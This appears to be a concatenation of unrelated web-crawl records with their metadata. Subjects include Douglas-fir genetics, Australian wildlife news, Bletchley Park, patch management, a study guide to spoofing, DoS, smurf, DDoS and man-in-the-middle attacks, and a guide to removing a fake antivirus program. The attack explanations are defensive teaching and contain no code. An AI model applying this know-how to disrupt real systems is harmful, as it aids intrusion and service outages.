What happens if your wallet is stolen? You call the bank and cancel your cards.
And what about your Post-it? If it doesn't include your e-mail address or your PIN, you can reset your passwords in a timely fashion on a new piece of paper. You're good to go.
Using this methodology, you can maintain complex and unique passwords, and still have something handy for when you forget them. Because we all do forget stuff from time to time.
And if you're phished on one site, such as Facebook, your other accounts aren't sharing the same password.
Oh, one last piece of advice.
Don't put the Post-it on your monitor! And not on the underside of your keyboard either… everyone's familiar with that location too. | <urn:uuid:c1f55793-9114-41cb-b2d5-0ce15afe133d> | CC-MAIN-2017-04 | https://www.f-secure.com/weblog/archives/00001691.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00120-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.947002 | 712 | 2.53125 | 3 |
Wei X.-X.,CAS Institute of Botany |
Wei X.-X.,Forest Research Center and Institute for Systems and Integrative Biology |
Beaulieu J.,Forest Research Center and Institute for Systems and Integrative Biology |
Beaulieu J.,Natural Resources Canada |
And 5 more authors.
Tree Genetics and Genomes | Year: 2011
The contemporary genetic structure of species offers key imprints of how organisms responded to past geological and climatic events, which have played a crucial role in shaping the current geographical distribution of north-temperate organisms. In this study, range-wide patterns of genetic variation were examined in Douglas-fir (Pseudotsuga menziesii), a dominant forest tree species distributed from Mexico to British Columbia in western North America. Two organelle DNA markers with contrasting modes of inheritance were genotyped for 613 individuals from 44 populations. Two mitotypes and 42 chlorotypes were recovered in this survey. Both genomes showed significant population subdivision, indicative of limited gene flow through seeds and pollen. Three distinct cpDNA lineages corresponding to the Pacific Coast, the Rocky Mountains, and Mexico were observed. The split time of the two lineages from the Rockies lineage was dated back to 8.5 million years (Ma). The most recent common ancestors of Mexican and coastal populations were estimated at 3.2 and 4.8 Ma, respectively. The northern populations of once glaciated regions were characterized by a high level of genetic diversity, indicating a large zone of contact between ancestral lineages. A possible northern refugium was also inferred. The Mexican lineage, which appeared established by southward migration from the Rockies lineage, was characterized by the lowest genetic diversity but highest population differentiation. These results suggest that the effects of Quaternary climatic oscillations on the population dynamics and genetic diversity of Douglas-fir varied substantially across the latitudinal section. The results emphasize the pressing need for the conservation of Mexican Douglas-fir. © 2011 Springer-Verlag. Source | <urn:uuid:57f9faba-d025-410f-abb8-ff21406efe25> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/forest-research-center-and-institute-for-systems-and-integrative-biology-1735004/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284270.95/warc/CC-MAIN-20170116095124-00238-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937086 | 409 | 3.109375 | 3 |
The neural network was derived from analysis of the most successful detectives in Chicago. These six detectives were at the top of the department in terms of arrests made and cases closed, Muscarello said.
"We picked their brains for the type of patterns they were looking for. We looked at what they did, and found there was no one way they did their work," he said. "Some of them concentrated on the victim, some on the time of day, but they all concentrated on something, and it helped them solve the crime. We picked out the best data features to look at and tried to normalize them."
What he means by "normalize" is programming the system to look for patterns the way the human brain does. Take height, a common data element, for instance.
Eyewitness accounts are notoriously inaccurate, so trying to be too detailed can lead a detective in the wrong direction. Muscarello said in terms of height, people think in terms of tall, average and short -- and that's how it will be programmed into the network.
"The victim has very little time to see the offender," Muscarello said. "Even in the best of circumstances, people are usually off when they try to estimate someone's height unless they're about your height."
One of the six detectives focused heavily on getaway vehicles. Like the height of suspects, Muscarello said, this data is "normalized" when programmed into the system. A victim might describe a getaway vehicle as a navy blue Toyota Corolla, but focusing just on that type of vehicle might lead an investigator to a dead end.
"That's too exact," Muscarello said.
A good investigator would focus on a dark vehicle, probably foreign, maybe Japanese. That's how the system is programmed to recognize a cluster or a pattern. The detective can find such a cluster by clicking on a drop-down box on the computer or typing in a query.
"The way we built this is the network will know the important things to look at, and it would also learn the less important things," Muscarello said. "So on its own it would do a pass with what it learned was important. What we also did is give the computer the capability so that the interface allowed you to either access all of the pre-determined case clusters [that the system is programmed to recognize], or enter your new data select things you were interested in looking for."
The department will test linking the CSSCP to the Citizen Law Enforcement Analysis and Reporting (CLEAR) system, the state's crime data warehouse.
Both resources could help police solve crimes in two direct ways. First, by locating clusters of data elements that illustrate a clear pattern and point to a specific suspect(s); and second, by having the CSSCP link the detainee to previous crimes or even cold cases.
With a suspect in custody, police can examine how the crime was conducted, then sift through the CSSCP and try to match the characteristics of the latest crime with ones from the past, Maris said.
When they find a pattern, they can interrogate the suspect further with the evidence.
"'We caught you for this burglary; did you do these other six burglaries, too? You used the same MO, the same characteristics,'" Maris explained as an example of tying a known suspect to previous cases.
Most convicted criminals that are incarcerated continue committing crimes once released, so going back and looking at cold cases or even solved ones can lead to new arrests.
"We know that most crimes are committed by a few criminals, and we just aren't closing out that many cases," Muscarello said.
He's spent the last decade trying to fix that. | <urn:uuid:d739a060-bfd5-4dc4-8c67-55f7384a7503> | CC-MAIN-2017-04 | http://www.govtech.com/e-government/Brain-Power.html?page=2 | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280242.65/warc/CC-MAIN-20170116095120-00542-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.973172 | 763 | 2.828125 | 3 |
Palmer C.M.,Northern Territory
Environmental Entomology | Year: 2010
Arid and semiarid environments are characterized by highly unpredictable and 'pulsed'availability of essential biological resources. The 'boom and bust'response of many vertebrates is commonly invoked for invertebrates and especially insects. This perception of the Australian arid zone is exacerbated by the lack of long-term surveys of insects identified at high levels of taxonomic resolution. From an 18 mo continuous survey of insects in central Australia I determine the phenology of many insect taxa, and clarify which climatic variables most influenced the activity of these taxa. Total abundance and taxon richness were higher in the warmer months and lower in the cooler months. Minimum temperature, rainfall during the survey month, and rainfall during the previous month had significant effects on phenology, demonstrating that there is pronounced and predictable activity of many species in the absence of rain, although rainfall has a marked effect on the activity of some species. Other species were more active or only active in the coolest months. These findings have implications for the most productive time for surveys in the Australian arid zone, the availability of insects as prey or pollinators, and for the potential effects of climate change. © 2010 Entomological Society of America. Source
News Article | November 4, 2015
Scientists from Queensland University of Technology recently discovered a unique genetic code in an Australian tobacco plant which may someday pave way for food production in space. Professor Peter Waterhouse said that they first traced the history of the tobacco plant Pitjuri or Nicotiana benthamiana. The Pitjuri is a "laboratory rat" plant which is often used to test vaccines and viruses. Waterhouse discovered that the plant adapted over-sized seeds as well as rapid reproduction and sacrificed its immune system. To find out how the adaptation works, Waterhouse and his colleagues mapped the gene fault which switched off the Pitjuri's immune system. Their work is issued in the journal Nature Plants. After sequencing the plant's genome and looking into historical records, the team determined that the Pitjuri originated from the harsh desert area near the Northern Territory border and Western Australia. This enabled the tobacco plant to survive and adapt to the hostile environmental conditions. "You'd think it wouldn't be a good thing to have lost your immune system and yet the plant has survived for this length of time and we wondered why," said Waterhouse. He described the process as this: for the plant to survive, it had to germinate and grow very quickly, and place its seed so that when there is rainfall, it can go through its life cycle as fast as it can. This ability is more beneficial to the plant than being able to defend itself from non-existent pathogens in the area, he said. Waterhouse said that the plant's harsh living conditions are almost as hostile as the disease-free environment in space. Researchers believe that their findings could have great impact on biotechnology research and space colonization. Because the team narrowed down the exact gene responsible for the Pitjuri's unique abilities, their next step is to replicate the gene fault in other plants in hopes that they could significantly increase yields on seed crops. Waterhouse explained that it would not be difficult now to test other plant species and knock out the same gene to figure out if they could also produce the same special properties that the Pitjuri has. "It will be interesting to see what a plant will do if you give it this bigger boost of energy to spend in any way it likes," added Waterhouse.
Researchers and Traditional Owners traversed the spectacular reaches of the Prince Regent, Hunter and Roe rivers at night to discover that croc numbers have trebled from 30 years ago when hunting had decimated their numbers. They counted the crocodiles by torchlight, the beam of torchlight reflecting off the crocodiles' eyes gleaming from dark waters. The surveys revealed a healthy croc population, comparable to crocodile numbers in the crocodile-rich waters of the Northern Territory, according to WA Department of Parks and Wildlife (DPAW) scientist Andrew Halford. However, the increase in crocodile numbers combined with warming waters are pushing crocodile populations further south to tourist areas such as Broome, he says, thereby posing new challenges for conservation managers seeking to keep people safe. "We've got a situation where there will be more and more human and crocodile interaction and that's clearly a management issue that we need to keep an eye on," Dr Halford says. "In the news the other day we had a couple of big crocs at Cable Beach that would have posed a serious threat to beachgoers so they were removed and taken to a crocodile park." Some crocodiles in tourist locations in remote areas have lost their fear of humans and pose an elevated risk to visitors, Dr Halford says. Such crocodiles are usually killed, while crocodiles in more accessible areas are translocated away from human populations—a difficult, dangerous and expensive operation. As part of the surveys the team counted the crocs from a five-metre aluminium boat specially adapted for crocodile surveys, with higher-than-standard safety rails and non-reflective black paint on the hull to prevent spotlight reflections. The team felt privileged to work in such a spectacular setting, Dr Halford says, though there were certain encounters that left their hearts racing. "Sometimes we'd be in these little creeks at night time in the middle of nowhere and you'd see a really large croc," he says. "Usually they just disappear but sometimes, when they are not too happy you're there, they'll come towards you at quite a rate." The Dambimangari, Willingin and Wanambal Gaambera Traditional Owners helped conduct the surveys as part of a bigger plan to enable traditional owners to take over the monitoring of plants and animals in their own country.
News Article | November 30, 2015
Bushfires have been ravaging certain areas of South Australia, with two people confirmed dead, 90 victims in the hospital and 87 homes burnt to ashes. More than 27,000 head of livestock have also perished in the bushfires. One man, however, was able to save his house from destruction through quick wits in using smart home technology. Charles Darwin University vice chancellor Professor Simon Maddocks was in Darwin in the Northern Territory of Australia when he was informed of the bushfire ravaging the nearby state. Named the Pinery Fire, the fire was on its way to engulfing Maddocks' property in South Australia, and he would not be able to get there in time to save it as he was 3,000 kilometers away. Using the property's home security, the agricultural scientist watched as the fire approached. Maddocks, however, was not entirely helpless at all. Using an app on his smartphone, he activated the irrigation sprinklers at his property. While his quick thinking was not able to save his crops, which were destroyed by the fire, his farmhouse and animals were able to escape harm. The smart sprinklers played its part in saving the farmhouse and animals, with Maddocks also attributing the rescue to his swift-acting neighbors. "The fire came up all around the house, but my ability to turn on irrigation systems from my phone in Darwin and the fact that I had neighbours patrolling with fire units, we're lucky we got away with a house," Maddocks said. "To suddenly watch your 15 years of labour of love just go to pot in front of your eyes is a bit surreal," Maddocks added, stating that he felt so helpless as he was four-and-a-half hours away when the events unfolded. Maddocks revealed that he will begin to rebuild the property immediately.
So why do they do it and what do they want? Flies are one of the most diverse insect orders, with more than 150,000 species described worldwide in more than 150 different insect families. In Australia, entomologists (scientists who study insects) estimate there are more than 30,000 species of fly, and yet only 7,700 species have been described. There are two main types of fly: the Nematocera (which includes mosquitoes and non-biting crane flies) and the Brachycera (which includes house flies, fruit flies, and horse flies). In Australia, there is only one type of fly that's attracted to us, rather than our blood: the bush fly (Musca vetustissima, Diptera: Muscidae), which is a non-biting fly and close relative of the house fly (Musca domestica). These flies are after the proteins, carbohydrates, salts, and sugars naturally present on your skin. All the other flies around you are probably after your blood, and that includes mosquitoes and horse flies. And yes, unfortunately some people are more attractive to mosquitoes than others. Although mosquitoes and other blood-feeding insects are attracted to the carbon dioxide we exhale, we know the insect sensory system also helps find exposed skin. Since the skin near our faces is often exposed, that's one reason flies are always buzzing around your face and hands. In the mosquito, the proboscis is sharp and needle-like; in the deer fly (also known as the horse fly, or march fly in Australia), it is a large, wide spike. This reflects the different feeding styles found in flies: mosquitoes use a hypodermic needle approach, and are so selective about where they bite research has shown they can actually find capillaries underneath the skin. As most people know, these bites can be very itchy and in rare cases the proteins transferred during a mosquito bite can cause anaphylactic shock. Horse flies use a "slash and suck" approach, where they cut the skin and then lap up the blood that comes out. These bites are my least favourite of any insect. Biting midges, also known as sandflies in Australia, are blood-feeding flies (Diptera: Ceratopogonidae), and are known vectors of lesser human pathogens and major veterinary pathogens in livestock. Their bites are also intensely itchy. Fruit flies and house flies use a slightly different method: their mouthparts are like sponges, and they regurgitate a mixture of digestive enzymes onto the surface they're feeding on and then lap up the resulting liquid. Although they are irritating, they don't bite humans. Along for the ride The biggest problem with fly bites isn't so much that the injury is painful or irritating, it's the pathogens the insect can transmit through their bite. In order for a vector-borne disease to spread, three things need to be present: For some diseases, such as dengue fever, in Australia we have the mosquito but generally don't have the virus. Outbreaks of dengue occur when someone brings the dengue virus into the country, and then the mosquitoes that are already here can spread the disease. When you look at the number of notifications for dengue virus infection, you can see that Queensland has the highest number of cases. But when you factor in the population size, how does that change? When you look at the number of notifications per 100,000 people in the population, the tropical areas of Australia (the Northern Territory, Western Australia, and Queensland) are by far the most at risk. 
That's because those areas are where you're most likely to have the disease, the insect that spreads the disease, and humans. How can you reduce your risk of being bit? DEET or picaridin containing topical insect repellents work best to stop mosquitoes from biting. Wristbands have been shown not to repel mosquitoes, and botanicals rarely if ever provide the same level of protection. For nuisance flies this may not matter, but for those insects that can carry human disease your best method is to remove all the standing water from around your house (to prevent eggs from developing there), and stay inside when you are able at dusk (to prevent being bit when the mosquitoes are most active). Most blood feeding flies, like mosquitoes, take opportunistic blood meals to complete their lifecycle. The blood meal is required in order for females to lay eggs. In several species of mosquito, females aren't selective and will take their blood meals from a range of vertebrates. Adult males and sometimes females feed only on nectar or pollen. In tabanids like horse flies, nectar feeding occurs frequently in both males and females. When flies land on a series of plants to feed on nectar, they spread the pollen between flowers and help fertilise the next generation of plants. As pollinators, flies perform a valuable role in the ecological community for our native plants, and are also helping farmers. Recent research from scientists in Australia has shown that non-bee pollinators, including flies, play an important role in crop pollination across the world. So next time flies flood your picnic, bushwalk or barbecue, consider that they may have helped put some of that food on your table. Explore further: Researchers investigate new suspect in West Nile deaths of pelicans | <urn:uuid:e99a00c3-beef-4895-ad3f-bef2697f9d15> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/northern-territory-972820/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279657.18/warc/CC-MAIN-20170116095119-00322-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.964129 | 2,673 | 3.703125 | 4 |
Bletchley Park, which quietly and secretly evolved into the modern spy center GCHQ, was home to the UK’s code-breaking efforts during World War 2. Alan Turing is probably the best known of the code-breakers (he committed suicide by cyanide in 1954, probably as a result of persecution for his homosexuality). Less known, however, is the ‘Testery’ group which successfully broke the Lorenz code used with the Tunny code machine. While Enigma was based on four revolving wheels, Tunny used 12 wheels and was considered by the Nazi high command to be unbreakable.
But break it they did; and key Testery member Capt Jerry Roberts has now been honored for his work with the award of an MBE. “Speaking on Radio 5 Live,” reports the BBC, “he said he was pleased to be appointed MBE, but felt his colleagues perhaps deserved greater recognition.” Capt Roberts, now aged 92, has spent the last few years campaigning for greater recognition of what he calls the ‘four T’s’: the Testery group as a whole, Turing, Bill Tutte and Tommy Flowers.
Testery was established in 1942 under Major Ralph Tester, specifically to crack the Lorenz cipher. Capt Roberts was one of the original members. Turing is well known. Bill Tutte was the mathematician who cracked the code itself, and worked out the logical structure of the cipher machine. He died in 2002. Tommy Flowers (1905-1998) designed and built Colossus, the world’s first programmable electronic computer, in just 10 months. It became operational in February 1944. For 19 months before Colossus, the Testery group was decrypting Lorenz by hand.
By the end of the war, with Colossus, the Testery group was breaking 90% of the intercepted traffic given to them. After the war, General Dwight D. Eisenhower said that “Bletchley decrypts shortened the War by at least two years.” During this period the war was causing the death of up to 10 million people per year. It could be suggested, then, that Capt Jerry Roberts MBE was instrumental in saving the lives of 20 million people. | <urn:uuid:b6bf9ee5-9070-4f2d-a134-6db4f587b985> | CC-MAIN-2017-04 | https://www.infosecurity-magazine.com/news/bletchley-park-hero-captain-jerry-roberts-awarded/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280308.24/warc/CC-MAIN-20170116095120-00230-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.981762 | 465 | 2.890625 | 3 |
It’s nearly impossible to escape computer-based information in today’s high-tech society. From doctors’ offices to hardware stores, organizations and companies of all sizes record, track and transmit data electronically – making it an integral part of daily business and commerce. But with this increased dependency comes greater risk. Security failures, information exposure and privacy invasion is far greater in today’s electronic-based world. The risk of insecure data not only concerns consumers – who are wary of fraud, identity theft and privacy – but greatly concerns businesses, which can be held liable for information that is unintentionally exposed, despite a firm’s best efforts to protect such data.
Unlike paper-based storage, which requires physical access to compromise, today’s electronic files are virtually accessible anywhere in the world. Security vulnerabilities in software applications, electronic files or computer operating systems can be quickly exploited to inflict serious damage: accessing private or secure data; stealing passwords or identities; performing unauthorized financial transactions; examining personal health records; or capturing sensitive network data.
The majority of software vulnerabilities today are found in Microsoft-based products – primarily because they are the most widely used software on the planet. And while Microsoft releases more than just vulnerability fixes on Patch Day – also providing software updates that add new features to existing products – the security patches almost always grab the most attention, because they expose what are dangerous weaknesses in widely used software products.
Patch and go
So what’s all the fuss? Just install the security patches and you’re safe, right? Unfortunately, no. As IT professionals will attest, it can be extremely difficult to test and apply the necessary patches to every vulnerable computer within an enterprise before exploits become public. Compounding the matter, some patches can actually interfere with, or “break” existing software applications, adding to the time it takes to determine which patches can be applied and which need to be tested within a given organization’s network.
Moreover, many still handle patch management manually, physically going to every computer on the network to download and install patches. For enterprises with hundreds or thousands of PCs, including mobile workers and remote offices, manually applying patches has proven to be an impossible task. As a result, network administrators fall behind, and critical patches often aren’t applied as quickly as needed.
No time to lose
Moments after the news of a new patch release, malware-writers start identifying security vulnerabilities and writing code to take advantage of flaws. For example, the patches for the RPC/DCOM flaws were released just 20 days prior to the onslaught of the Blaster worm attack in 2003.
But even a short 20 days can seem long when compared to today’s zero-day exploits. The disclosure of the Windows Metafile (WMF) flaws in December 2005 immediately led to the discovery of over 80 active exploits. By the time Microsoft released a patch ten days later, enterprises were already at high risk of infection and there was no time to spare in getting the necessary patches in place.
What’s a company to do?
By taking an enterprise-wide approach to security assessment, companies need to evaluate internal patch management processes, understanding the potential risk to network systems and data and ultimately adopting a proactive approach to patch management. New tools are available to help companies of all sizes eliminate many of the manual aspects of security patch management, allowing IT professionals to automate time-consuming aspects of patch management, while also accessing key features designed to help workers better understand, test, deploy and validate the right patches, in the amount of time required.
The most effective patch management software should provide a straightforward approach to patch scanning and remediation, ensuring accurate, secure processes that can protect every computer within the enterprise. Important features to look for include: automatic or scheduled installation of missing patches, the ability to rollback or uninstall patches, knowledge about the patches including the vulnerability severity and links to third party information about the issue, and summary reports for executive reporting.
A good patch management software package should also include a shared back-end database to facilitate collaboration and patch management tracking to compare progress against existing enterprise-security initiatives. Such features are important because the first step in the patch process often requires wading through ad-hoc releases, service packs and temporary fixes, to determine what patches are applicable to the enterprise.
After needed patches are identified, a relatively easy set of steps helps ensure that the patch process benefits the enterprise, and doesn’t cause more harm than good:
1. Patch Testing – Once a patch is identified, it must be tested to evaluate the potential impact on a particular computing environment. Installing the patches to a control group and subjecting them to normal use prior to deployment is one option.
2. Scan and Assess – Because computing environments are complex and dynamic, simply knowing that a patch is likely needed somewhere in the enterprise provides little conclusive evidence as to exactly where holes still remain. To identify such holes, systems need to be scanned and assessed, identifying all systems that require patches while accepting systems that need to be left alone.
3. Remediate – Remediation, which involves applying patches to systems in need, is usually the most time-intensive part of the patch management process. However, it is also the most crucial step for protecting the enterprise.
4. Validate and Report – To verify patches have been properly installed, IT managers need to validate and report on key systems and applications. This step provides final assurance that the patch process is complete.
The bottom line
Return on investment (ROI) is a mantra in business, and for good reason – companies want to know that the technology investments they make today will protect them from losses in the future. Based on extensive research and real-world examples, automated patch management can provide a clear ROI because it results in significant productivity gains for end users and administrators alike. Specifically, such systems help improve productivity in two key areas:
– automating the manual process of patching systems and solutions, and
– reducing the number of successful attacks against identified vulnerabilities.
Each step in the patch management process expends resources, but automating the process significantly reduces the total hours required for managing the process to completion. Patch management systems can dramatically improve performance for IT administrators responsible for patching systems, moving the patch management process from a manual, ad-hoc series of steps to an automated system that installs key structures and processes designed to achieve significant time and cost gains.
The most important benefit of a patch management system may lie in its ability to reduce risk. Successfully patched computer systems can eliminate known vulnerabilities and therefore reduce the instances and impact of attacks – preventing the ensuing loss of data, privacy and reputation often experienced by companies suffering an attack. Using automated patch management as a proactive security measure actually not only reduces the total number of successful attacks against systems, but also reduces the propagation of attacks.
Risk reduction protects against qualitative losses to reputation, legal action and competition. Such benefits can be even more significant to an organization than the baseline time and costs savings achieved through improvements to the overall patch management process. Although lost productivity of end-users is quantifiable, it’s usually not something that can be recovered directly. Giving employees, contractors and business partners the ability to conduct business without disruption can be a significant benefit to companies.
Ensuring network security through automated patch management is no simple task. It requires diligence to stay informed and secure. However, companies that understand risk and proactive security will find that the investments made in an automated patch management process far outweigh the costs. | <urn:uuid:611c9653-5370-4e1c-86c0-26094480fd5f> | CC-MAIN-2017-04 | https://www.helpnetsecurity.com/2006/04/28/automated-patch-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00348-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.935918 | 1,548 | 2.625 | 3 |
Picture This: A Visual Guide to Disruptive Attacks
An attack on your systems that is intended to be disruptive to legitimate service can take many forms, and the terms used to define such attacks can be confusing on a certification exam. In the real world, you know that your servers are responding to a lot of requests that they should not be getting, and that this is bringing your performance to a crawl. So you start taking action to put a stop to it right away.
In the exam world, you have to approach it somewhat differently: you need to pick up on a few clues here and there and be able to determine whether it is a spoofing attack or a smurfing attack, and then pick the right multiple-choice answer.
This guide looks at some of the more common disruptive attack types and consists of a subset of those you need to know to earn CompTIA’s Security+ designation (both on the current SY0-301 exam and the next version of the test that is currently slated for release in the second quarter of 2014).
To illustrate the differences between them, the analogy used throughout is that of a student just trying to make it through class and participate the same as all other students. The attacks that are occurring, exaggerated a bit for emphasis, disrupt our hypothetical student’s ability to continue to concentrate and participate as he normally would.
Spoofing, quite simply, can be described as faking. The person doing the spoofing is trying to make it look as if it is another party taking the action. Always think of spoofing as fooling. Attackers are trying to fool the user, fool the system, and/or fool the host into believing they’re something they aren’t. Because the word spoof can describe any false information at any level, spoofing can occur at any level of a network.
Figure One: With spoofing, the attacker attempts to make it look as if it is another who is interacting with you. In this case, the hands do not belong to the person it is thought they are associated with. Note that others may be able to see what is transpiring, but that does not protect you.
Some of the most common spoofing attacks use e-mail source addresses, packet source addresses, and system MAC addresses to make it look as if another party is involved. Network traffic filters and e-mail filters should be configured to check for source spoofing in network packets and emails.
It should make sense that if a packet or message is leaving your LAN, then it cannot have a valid source address from the Internet AND if the packet is entering your LAN, then it cannot have a valid source address from the LAN. Filters of this type are called egress (exiting) and ingress (entering) filters and they should be configured on every border system.
Many have come to rely on a caller ID display to inform them of who is calling and serve as a simple form of authentication. There are several programs available, however, that allow a miscreant to send fake values for both the phone number and the name display to a caller ID box. This is known as caller ID spoofing and, when coupled with other forms of social engineering, can help convince an insider that they are talking to someone trusted when the opposite is true
Denial of Service (DoS)
With a denial of service (DoS) attack, you’ve attracted the interest of someone who is now focused on attempting to disrupt your ability to interact normally. If they can keep you busy responding to illegitimate requests, they can prevent you from functioning normally.
Figure Two: A DoS attack tries to tie up all of your attention and prevent you from functioning normally.
By preventing authorized users from having access to your services, attackers can cause you great harm. Most DoS attacks come as either the exploitation of a flaw, or from excess traffic. While you can curtail the exploitation of flaws by keeping patches and updates current (as well as by using firewalls), traffic-based attacks require detection and network traffic filtering.
With the right tools, you can stop the attack from getting in your network, but you also need to stop it from upstream as well or else communication to and from your network will be slowed by the bogus attack traffic and you will be unable to support legitimate communications. Stopping the upstream traffic can mean getting help from your ISP.
Two of the most common types of DoS attacks are the ping of death and the buffer overflow. The ping of death crashes a system by sending Internet Control Message Protocol (ICMP) packets (think echoes) that are larger than the system can handle. Buffer overflow attacks, as the name implies, attempt to put more data (usually long input strings) into the buffer than it can hold.
The best way to think of smurfing is to imagine that the person wanting to conduct a DoS attack against you doesn’t have enough clout to slow you down and so they solicit help doing so from another party — sometimes without that party’s knowledge. The key to identifying a smurf attack is that another party, larger than the initiating party, is employed to harm the target system.
Figure Three: With a smurfing attack, another party that is larger is brought in to help damage your ability to interact normally.
As an example, suppose the attacker uses IP spoofing and broadcasts a ping request to a group of hosts in a network. The ICMP ping request (type 8) would be answered with an ICMP ping reply (type 0) if the targeted system is up (otherwise an unreachable message is returned). If the broadcast were to be sent to the network, all of the hosts could answer the ping and the result could be an overload of the network and the target system. In this case, rather than depending on the traffic from just one system to be able to bring the target down, the traffic of the network was employed to do the task.
The primary method of eliminating smurf attacks involves prohibiting ICMP traffic through a router. If the router blocks ICMP traffic, smurf attacks from an external attacker aren’t possible.
Distributed Denial of Service (DDoS)
A distributed denial-of-service (DDoS) attack is similar to a DoS attack except that more attack points are involved. A DDoS attack amplifies the concepts of a DoS attack by using multiple computer systems (often through botnets) to conduct the attack against a single organization.
Figure Four: With DDoS attacks, numerous entities are brought in to disrupt the normal operations of the target.
An attacker can load an attack program onto dozens or even hundreds of computer systems and have them all pointed at the same target. It is possible for the attack program to lie dormant on these computers until they get an attack signal from a master computer which then notifies them to launch an attack simultaneously on the target network or system.
The systems taking direction from the master control computer are referred to as zombies or nodes. These systems merely carry out the instruction they’ve been given by the master computer. In the past, DDoS attacks have hit large companies such as Amazon, Microsoft, and AT&T and they are often widely publicized in the media.
Man in the Middle and Replay Attacks
A man in the middle attack is also often referred to as session hijacking, for that is what transpires. An entity for whom the message (data/packet/etc.) is not intended gathers the data for some illicit purpose.
Figure Five: With a man in the middle attack, a third party gathers data about the session that they should not be privy to.
Quite often, the method used in these attacks clandestinely places a piece of software between a server and the user that neither the server administrators nor the user are aware of. The intercepted data can be used as the starting point for a modification attack that the server responds to, thinking it’s communicating with the legitimate client. The attacking software continues sending on information to the server, and so forth.
For exams, know that a man in the middle attack is an active attack. Something is actively intercepting the data and may or may not be altering it. If it’s altering the data, the altered data masquerades as legitimate data traveling between the two hosts. In recent years, the threat of man-in-the-middle attacks on wireless networks has increased. A malicious rogue can be outside the building intercepting packets, altering them, and sending them on.
A common solution to this problem is to enforce a secure wireless authentication protocol such as WPA2. IF the intercepted data is sent again, then it qualifies as a replay attack. All that differs between man in the middle and replay attacks is that in the latter intercepted data is sent again (replayed).
Figure Six: With a replay attack, the same data that was intercepted can be sent to you again by a third party that leads you to believe it is still coming from the first party.
This type of attack can occur with security certificates from systems such as Kerberos: The attacker resubmits the certificate, hoping to be validated by the authentication system and circumvent any time sensitivity. If this attack is successful, the attacker will have all the rights and privileges from the original certificate. This is the primary reason that most certificates contain a unique session identifier and a time stamp. If the certificate has expired, it will be rejected and an entry should be made in a security log to notify system administrators.
Man in the middle and replay attacks can be thwarted by complex packet sequencing rules, time stamps in session packets, periodic mid-session reauthentication, mutual authentication, the use of encrypted communication protocols, and spoof-proof authentication mechanisms.
Summing it up
For certification study, know that all of these attacks are similar and there can be overlap between them. Spoofing is often used in conjunction with other attacks, but merely involves one party pretending to be another. DoS attacks, whether spoofed or not, involve trying to disrupt your services by keeping them so busy responding to non-legitimate requests that they cannot effectively contend with the legitimate requests.
If the attacker brings in another — larger — party to act on their behalf, it is known as smurfing. If the DoS attacker brings in lots of other parties to overwhelm you, then it is known as DDoS. A man in the middle attack intercepts data that intended to only be between the sender and receiver. If the man in the middle resends the data — with or without altering it — then it becomes a replay attack. | <urn:uuid:fea89906-0652-4cf5-a668-4282f7176a15> | CC-MAIN-2017-04 | http://certmag.com/picture-this-a-visual-guide-to-disruptive-attacks/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280900.71/warc/CC-MAIN-20170116095120-00468-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.953035 | 2,193 | 3.1875 | 3 |
Antivirus Protection is a rogue anti-spyware program from the same family as Antivirus Soft and AV Security Suite. This family of rogues is installed through the use of malware and exploit kits that download and install Antivirus Protection onto your computer without your permission. When this program is installed it will be configured to start automatically when Windows starts, and once started, will perform a scan of your computer and state that it has found numerous infections. It will not, though, tell you the files that are supposedly infected and will also state that you cannot remove anything until you first purchase the program. This is a complete scam, as the program is scripted to display infections every time it is run. That means if you reinstalled Windows and ran Antivirus Protection it would still say that you are infected. It does this to scare you into thinking that your computer has a security problem so that you will then purchase the program. When you purchase the program, though, all you do is waste your money as the program has no useful function for your computer.
When Antivirus Protection is running it will state that most programs are infected when you attempt to run them. The text of this fake infection alert is:
Application can't be started. The file notepad.exe is damaged. Do you want to active your antivirus software now?
It does this for two reasons. The first is to make you think that your legitimate, and clean, programs are infected so that you will then purchase the rogue. The second reason is to block you from running any legitimate security programs that may help you remove this infection.
While Antivirus Protection is running it will also show you fake security alerts that attempt to further scare you into thinking you have a infection on your computer. These alerts will state that active malware has been detected or that your computer is under attack. The text of these alerts is:
Windows Security Alert
Windows reports that computer is infected. Antivirus software helps to protect your computer against viruses and other security threats. Click here for the scan your computer. Your system might be at risk now.
Antivirus Software Alert
Your computer is being attacked by an internet virus. It could be a password-stealing attack, a trojan - dropper or similar.
Just like the other false infections alerts, these warnings are all fake and should be ignored. Last, but not least, Antivirus Protection will also configure your computer to use a proxy server at 127.0.0.1:47392, which is actually the Antivirus Protection program itself. This makes it that when you browse the web using Internet Explorer, the rogue will intercept all your web browser requests and instead display a page that shows a security warning about the site you are visiting. This warning states:
Internet Explorer warning - visiting this site may harm your computer!
Most likely causes:
- The website contains exploits that can launch a malicious code on your computer
- Suspicious network activity
- There might be an active spyware running on your computer
These warnings should be ignored as they are false. If you use a browser other than Internet Explorer you will not see the warnings at all and can browse the Internet like normal.
Without a doubt, Antivirus Protection Trial was created solely to trick you into purchasing the program by convincing you that your computer has a security problem. Now that you know what this program does, it goes without saying that you should not purchase this program for any reason. If you already have purchased it, then we suggest you contact your credit card company and dispute the charges. To remove Antivirus Protection and any related malware, please follow the steps in the removal guide below.
Self Help Guide
- Print out these instructions as we may need to close every window that is
open later in the fix.
- Reboot your computer into Safe Mode with Networking. To
do this, turn your computer off and then back on and immediately when you
see anything on the screen, start tapping the F8 key on your
keyboard. Eventually you will be brought to a menu similar to the one below:
